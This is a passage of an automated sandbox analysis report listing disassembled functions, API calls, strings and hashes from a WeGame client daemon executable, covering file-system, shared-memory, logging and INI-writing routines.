                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,WEB_REDIRECT_URL_MAP_MEM,00000018,0000008C,0043FEED,?,?,00000010,0044C24C), ref: 0044AB9C
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420E77
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420F1B
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,C0000000,00000000,WEB_REDIRECT_URL_MAP_MEM,00000018,0000008C,0043FEED,?,?,00000010,0044C24C), ref: 0044AB28
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                Strings
                                                                • WEB_REDIRECT_URL_MAP_MEM, xrefs: 0044A990, 0044AA25
                                                                • [TPFUIFileSys][OnUpdateRedirectListToFile] create share mem failed, xrefs: 0044ABD5
                                                                • [TPFUIFileSys][OnUpdateRedirectListToFile] write share mem failed, out of size=%d , xrefs: 0044AB67
                                                                • [TPFUIFileSys][OnUpdateSharedMemForQBlinkRedirect] open mem failed, error=%d , xrefs: 0044AAD8
                                                                • WEB_REDIRECT_URL_MAP_MEM_MUTEX_NAME, xrefs: 0044A96A
                                                                • e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tpfuifilesys.cpp, xrefs: 0044AAB9, 0044AB4B, 0044ABBF
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_log_instance@base@@Logger@1@$D@std@@U?$char_traits@V?$allocator@V?$basic_string@memmove$?is_shared_mem_exist@common@ierd_tgp@@D@2@@std@@D@2@@std@@@ErrorH_prolog3H_prolog3_LastShared_mem_obj@common@ierd_tgp@@mallocstrncpy
                                                                • String ID: WEB_REDIRECT_URL_MAP_MEM$WEB_REDIRECT_URL_MAP_MEM_MUTEX_NAME$[TPFUIFileSys][OnUpdateRedirectListToFile] create share mem failed$[TPFUIFileSys][OnUpdateRedirectListToFile] write share mem failed, out of size=%d $[TPFUIFileSys][OnUpdateSharedMemForQBlinkRedirect] open mem failed, error=%d $e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tpfuifilesys.cpp
                                                                • API String ID: 1326427004-290845240
                                                                • Opcode ID: cf20d964bc08949dec3c6ab0db8866f9adf2c692c69552714d102ef57ca2ce87
                                                                • Instruction ID: dd87ef5b1d7eeca28e9c812f0e309c3bbf6b50484d276d912e9a6fe27d04ccf5
                                                                • Opcode Fuzzy Hash: cf20d964bc08949dec3c6ab0db8866f9adf2c692c69552714d102ef57ca2ce87
                                                                • Instruction Fuzzy Hash: 8B91E470D40344EFEB10DF69C841BEEBBB1AF14318F24819EE545AB282D7789E44CB5A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0041A960 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 293COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _waccess.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,00000000,?,85A35C35,00000000,?), ref: 0041AA50
                                                                • _waccess.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,00000000), ref: 0041AAC1
                                                                • GetFileAttributesExW.KERNEL32(?,00000000,?), ref: 0041AAEA
                                                                • memset.VCRUNTIME140(?,00000000,0000009C), ref: 0041AB4B
                                                                • memset.VCRUNTIME140(?,00000000,00000041,00000175,?,?,?,0000009C), ref: 0041AC2A
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0000009C), ref: 0041AD04
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0000009C), ref: 0041AD54
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo_noreturn_waccessmemset$AttributesFile
                                                                • String ID: VFileSysBase::Create() $VFileSysBase::Create() $VFileSysBase::Create() $VFileSysBase::Create() $VFileSysBase::Create() $vfs
                                                                • API String ID: 3723302470-2140787936
                                                                • Opcode ID: 6b150e3efd21cb1073930e5cf5d961b9150a428ff9f62df15c232089181b4a8f
                                                                • Instruction ID: a89fecbca2555464ad84014962c68a6886cdf4e08ed8f9ce62bb5fbe8ee497d0
                                                                • Opcode Fuzzy Hash: 6b150e3efd21cb1073930e5cf5d961b9150a428ff9f62df15c232089181b4a8f
                                                                • Instruction Fuzzy Hash: E5C1D230A01258DFDB20CF64DC44BDEB7B1BF05305F1445AAE448A7281D7B89AD8CFAA
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0041ADB0 Relevance: 22.9, APIs: 2, Strings: 13, Instructions: 386COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memset.VCRUNTIME140(?,00000000,0000009C), ref: 0041AED0
                                                                • memset.VCRUNTIME140(?,00000000,0000009C), ref: 0041AF95
                                                                  • Part of subcall function 0041DAB0: memset.VCRUNTIME140(?,00000000,0000009C,?,?,_VFS_BAK.tmp,?,85A35C35,00000000,?,?), ref: 0041DB16
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memset
                                                                • String ID: VFileSysBase::Load() $VFileSysBase::Load() $VFileSysBase::Load() $VFileSysBase::Load() $VFileSysBase::Load() $VFileSysBase::Load() $VFileSysBase::Load() $VFileSysBase::Load() $VFileSysBase::Load() $VFileSysBase::Load() $VFileSysBase::Load() $VFileSysBase::Load() $VFileSysBase::Load() VFS
                                                                • API String ID: 2221118986-4065571525
                                                                • Opcode ID: e4ab933bd600c3a3c1077b17d58db78694e20b8656ffb839bb701e9f36a1874f
                                                                • Instruction ID: 1ba8ee77958861d257e2acdf8cfeb8f9ece1059ec5618f81aaa1bf5f38a797d5
                                                                • Opcode Fuzzy Hash: e4ab933bd600c3a3c1077b17d58db78694e20b8656ffb839bb701e9f36a1874f
                                                                • Instruction Fuzzy Hash: 56E1C270600304ABDB209F21CC59BEB7BB5EF45304F14049FE8499B381D779A9D9CBAA
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0043C3B0 Relevance: 21.5, APIs: 11, Strings: 1, Instructions: 461COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memmove.VCRUNTIME140(?,null,00000004,85A35C35,?), ref: 0043C424
                                                                • memmove.VCRUNTIME140(?,00000000,?,?), ref: 0043C497
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000000,?,?), ref: 0043C4DE
                                                                • memmove.VCRUNTIME140(?,0048BF6C,00000001,?), ref: 0043C5C5
                                                                • memmove.VCRUNTIME140(?,0048BF70,00000001,00000001,00000000,0048BF6C,00000001,?), ref: 0043C62D
                                                                • memmove.VCRUNTIME140(?,0048BF74,00000001,00000001,00000000,0048BF6C,00000001,?), ref: 0043C691
                                                                • memmove.VCRUNTIME140(?,0048BF78,00000001,?,?,?,?,?), ref: 0043C6FC
                                                                • memmove.VCRUNTIME140(00000000,0048BF70,00000001,?,00000000,00000000,?,00000001,00000000,0048BF78,00000001,?,?,?,?,?), ref: 0043C75C
                                                                • memmove.VCRUNTIME140(?,00000000,?,00000001,00000000,0048BF70,00000001,?,00000000,00000000,?,00000001,00000000,0048BF78,00000001,?), ref: 0043C7C8
                                                                • memmove.VCRUNTIME140(?,0048BF80,00000001,00000001,00000000,0048BF78,00000001,?,?,?,?,?), ref: 0043C881
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?), ref: 0043C8EE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memmove$_invalid_parameter_noinfo_noreturn
                                                                • String ID: null
                                                                • API String ID: 2580228974-634125391
                                                                • Opcode ID: 7f90bb172aeeb5bef9891eb969580e954fe67d5b4a7d303a4583a0f4725528f9
                                                                • Instruction ID: e9f6888d5a6049f52694574bdf5ee591196fe01c09691868ab7eebf1045c6027
                                                                • Opcode Fuzzy Hash: 7f90bb172aeeb5bef9891eb969580e954fe67d5b4a7d303a4583a0f4725528f9
                                                                • Instruction Fuzzy Hash: 68F10831A002049FDB08EF68CDD1BAEB772EF49304F24552EE501AB392D779E945CB99
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00408A10 Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 355COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(?,85A35C35), ref: 00408A67
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00408B7D
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00408BDE
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00408C9E
                                                                • memset.VCRUNTIME140(?,00000008,00000030), ref: 00408D62
                                                                  • Part of subcall function 004136E0: memset.VCRUNTIME140(?,00000000,00000800,?,004028B2,VFSHelper::VFSHelper() ,C:\,?,?,?,?,?,00000000,00000001,00000000,00000000), ref: 00413705
                                                                  • Part of subcall function 004136E0: memset.VCRUNTIME140(?,00000000,00000800,?,?,?,?,?,?,?,?,00001000), ref: 00413738
                                                                  • Part of subcall function 004136E0: OutputDebugStringW.KERNEL32(?), ref: 0041376C
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00408E5D
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00408EAD
                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00408ED2
                                                                Strings
                                                                • VFSHelper::CreateFile() , xrefs: 00408BF7
                                                                • VFSHelper::CreateFile() , xrefs: 00408E1D
                                                                • VFSHelper::CreateFile() , xrefs: 00408DE3
                                                                • VFSHelper::CreateFile() , xrefs: 00408D10
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo_noreturn$memset$CriticalSection$DebugEnterLeaveOutputString
                                                                • String ID: VFSHelper::CreateFile() $VFSHelper::CreateFile() $VFSHelper::CreateFile() $VFSHelper::CreateFile()
                                                                • API String ID: 3145860676-1865619426
                                                                • Opcode ID: 1fef941ffa807df7c71f465a2db39eaf95296751a7c858ec438edc6ecb501197
                                                                • Instruction ID: e24de96cf3fb06669564d9b42d33a91537e2a7bdaed3e555c117b6029b022c55
                                                                • Opcode Fuzzy Hash: 1fef941ffa807df7c71f465a2db39eaf95296751a7c858ec438edc6ecb501197
                                                                • Instruction Fuzzy Hash: C8E1D170A00148CFDB14DF68CD45B9DBBB2BF85308F14416EE448A73D1DB79AA85CB99
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004185A0 Relevance: 21.3, APIs: 14, Instructions: 325COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00415380: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,85A35C35,?,0041DCF1,?,85A35C35,?,?,?,?,00000000,?,?,85A35C35), ref: 00415415
                                                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,85A35C35), ref: 004186AF
                                                                • _invalid_parameter_noinfo.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00418700
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,85A35C35), ref: 00418944
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: _errno_invalid_parameter_noinfofreemalloc
                                                                • String ID:
                                                                • API String ID: 3981873622-0
                                                                • Opcode ID: 37a5effbaa644d19f6be5381f47921dd67b3fa2ec425dfc73954db6ec68cd456
                                                                • Instruction ID: 95af8588c1b7e30206bed4e4ed3443176063990c996571bd2bbc98d6d27192cb
                                                                • Opcode Fuzzy Hash: 37a5effbaa644d19f6be5381f47921dd67b3fa2ec425dfc73954db6ec68cd456
                                                                • Instruction Fuzzy Hash: DBD17C75A00209DFCB14CFA8C980AEEBBB5FF49304F25412EE819A7351DB35A845CB99
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00408270 Relevance: 19.7, APIs: 9, Strings: 2, Instructions: 498COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(?,85A35C35), ref: 004082D3
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,?,?,?,?,?), ref: 004084B2
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00408522
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0040857B
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 004085E8
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 004087C6
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,00000164), ref: 0040884E
                                                                  • Part of subcall function 004037F0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0040BF07,?,?,?,?,00402937,?,85A35C35,?,?,00000000), ref: 00403887
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,00000164), ref: 004089C1
                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00000164), ref: 004089E6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo_noreturn$CriticalSection$EnterLeave
                                                                • String ID: VFSHelper::CreateVFSFile() $_KEY)
                                                                • API String ID: 363805048-2244242188
                                                                • Opcode ID: a7438322aa0189fa146eefe137e27646db79e1ba6649c8b3789ba1d975c8b263
                                                                • Instruction ID: e1bcb3a7a621f465b7fb04304d22f59c2148f693ac86d09a3bcfb547d2496b8a
                                                                • Opcode Fuzzy Hash: a7438322aa0189fa146eefe137e27646db79e1ba6649c8b3789ba1d975c8b263
                                                                • Instruction Fuzzy Hash: C2228B71D00258DBDB24DF64CE45BDEB7B1AF85308F1481AEE448B7291EB786A84CF58
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004584DC Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 117COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _CxxThrowException.VCRUNTIME140(?,0049C0FC,string pointer is null,true), ref: 00458549
                                                                • __EH_prolog3_catch.LIBCMT ref: 00458556
                                                                • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000020,?), ref: 00458587
                                                                • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140 ref: 004585B4
                                                                • ?is@?$ctype@D@std@@QBE_NFD@Z.MSVCP140(00000048,00000000), ref: 004585D0
                                                                • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140 ref: 004585E9
                                                                • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000001,00000000), ref: 0045861F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@@std@@U?$char_traits@$?getloc@ios_base@std@@?is@?$ctype@?setstate@?$basic_ios@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@D@std@@ExceptionH_prolog3_catchThrowVlocale@2@
                                                                • String ID: string$string pointer is null$true
                                                                • API String ID: 584260398-1256233052
                                                                • Opcode ID: a80767f16e7736e86af4ea5dae4fbc9f03db47c9bb841781014fcea92bdb77d0
                                                                • Instruction ID: 185dba4c57a48609e5a98123dc315d0af45e6a757b6153285285c84c8a484f1b
                                                                • Opcode Fuzzy Hash: a80767f16e7736e86af4ea5dae4fbc9f03db47c9bb841781014fcea92bdb77d0
                                                                • Instruction Fuzzy Hash: D541C234A002049FCB14DF69C849BAEBBB4AF54315F10809EE846A7393DF38DD46CB99
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0045E497 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 112COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0045E4A1
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045E4C5
                                                                  • Part of subcall function 00461579: __EH_prolog3_GS.LIBCMT ref: 00461583
                                                                  • Part of subcall function 00461579: memset.VCRUNTIME140(?,00000000,00000208,00000214,0046A105,?,85A35C35,?,?,?,?,?,0047B8A9,000000FF), ref: 004615A6
                                                                  • Part of subcall function 00461579: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004615BB
                                                                  • Part of subcall function 00461579: PathRemoveFileSpecW.SHLWAPI(?), ref: 004615C8
                                                                  • Part of subcall function 0040BBD0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0040E902,?,?), ref: 0040BC1D
                                                                • WritePrivateProfileStringW.KERNEL32(cmd_launcher_info,launcher,?,?), ref: 0045E54B
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,000000B0), ref: 0045E555
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,000000B0), ref: 0045E59F
                                                                Strings
                                                                • launcher, xrefs: 0045E541
                                                                • cmd_launcher_info, xrefs: 0045E546
                                                                • e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp, xrefs: 0045E581, 0045E5C3
                                                                • [main]clear_cmd_launcher_info, failed to clean launcher info, xrefs: 0045E5DA
                                                                • [main]clear_cmd_launcher_info, success to clean launcher info, xrefs: 0045E598
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_log_instance@base@@FileH_prolog3_Logger@1@$H_prolog3ModuleNamePathPrivateProfileRemoveSimpleSpecStringString::operator=Write_invalid_parameter_noinfo_noreturnmemset
                                                                • String ID: [main]clear_cmd_launcher_info, failed to clean launcher info$[main]clear_cmd_launcher_info, success to clean launcher info$cmd_launcher_info$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp$launcher
                                                                • API String ID: 1644293312-206155552
                                                                • Opcode ID: 57ea191e03a6df218c503df0e8fca18612885cdd35fb07b0fe0f7dc97c2d1312
                                                                • Instruction ID: c89813a599b4cba7ad12bf41d24179ad79478e41a470f75c049c4995d0467d70
                                                                • Opcode Fuzzy Hash: 57ea191e03a6df218c503df0e8fca18612885cdd35fb07b0fe0f7dc97c2d1312
                                                                • Instruction Fuzzy Hash: 28418070D00258EADB10EFE5C856BDEBB74AF14708F64405FE441B7282EB785A45CBAA
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004688EE Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 68COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 004688F8
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000080), ref: 004688FD
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00468986
                                                                • ?scale_path2absolute_path@common@ierd_tgp@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV34@@Z.COMMON(?,?,?,?,?,crash_log.rs,00000080), ref: 0046899A
                                                                • WritePrivateProfileStringW.KERNEL32(WeGame,CrashCount,0047F27C,?), ref: 004689C8
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                  • Part of subcall function 0043F4BB: __EH_prolog3_catch_GS.LIBCMT ref: 0043F4C2
                                                                Strings
                                                                • [tgp_daemon_main]before_exit, xrefs: 00468939
                                                                • CrashCount, xrefs: 004689BE
                                                                • crash_log.rs, xrefs: 00468973
                                                                • e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp, xrefs: 00468923
                                                                • WeGame, xrefs: 004689C3
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
